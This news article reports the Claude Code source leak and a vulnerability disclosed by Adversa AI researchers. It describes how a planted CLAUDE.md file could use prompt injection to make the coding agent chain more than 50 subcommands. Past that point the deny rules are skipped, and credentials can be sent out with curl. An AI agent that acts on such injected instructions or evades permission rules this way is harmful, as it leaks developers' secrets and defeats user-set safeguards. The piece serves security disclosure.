Claude Code leak: Researchers find first vulnerability

On March 31, Anthropic, the company behind the Claude AI, accidentally put a large portion of the code behind the Claude Code coding agent online. Since then, Anthropic has been trying to take action against copies of that code. Analysts have already found some information in the code that is potentially awkward for Anthropic. That includes the YOLO protocol.

Although no model weights were affected by the leak, it provides a detailed blueprint of how the tool works. This makes it easier for potential attackers to identify targeted vulnerabilities or create highly convincing copies of the program that could spread malware. In this context, the team at Adversa AI has discovered a critical security flaw in Claude Code’s permission system.

Claude Code is a terminal-based assistant that works directly in the command line and can edit files as well as execute shell commands. To maintain security, the tool uses a system of permission rules. Users can define so-called deny rules that strictly block certain commands, such as the command "curl," which is used to transfer data over a network. Other commands such as "git" for version control can, by contrast, be explicitly allowed.

The discovered vulnerability lies in the handling of complex command chains. To avoid performance issues and UI freezes, Anthropic limits its detailed security analysis to a maximum of 50 subcommands. If a command chain is longer, the individual checks are skipped and a general prompt is shown to the user asking whether the command should be executed.

This behavior could be exploited through prompt injection. In this type of attack, an attacker manipulates the AI’s inputs in order to bypass its security filters. Specifically, an attacker could place a manipulated file named "CLAUDE.md" in a public software repository. This file contains instructions for the AI agent. If a developer clones the repository and asks the agent to review the project, the AI could be instructed to execute a chain of more than 50 seemingly legitimate commands.

Starting with the 51st command, the individually configured deny rules no longer apply. While a single "curl" command would be blocked, it is ignored when embedded in a long chain. This allows attackers to send sensitive data such as SSH keys, cryptographic keys used for secure remote access to servers, or cloud credentials from the developer’s local machine to an external server in the background. Because the system in this case only requests a general confirmation, the user does not notice that their security policies have effectively been overridden.

Particularly notable is that the leaked source code for version 2.1.88 already contained a fix for this problem. Anthropic had developed a more modern parser, a program used to analyze code structures, that correctly checks deny rules regardless of the length of the command chain. However, this was not implemented in the public versions of the program. Instead, the older flawed mechanism continued to be used.

Anthropic appears to have resolved the problem in the meantime. According to the changelog for version 2.1.90, an issue described as parse-fail fallback deny-rule degradation was fixed. However, according to the researchers who identified the potential security vulnerability, there are other ways to address the problem.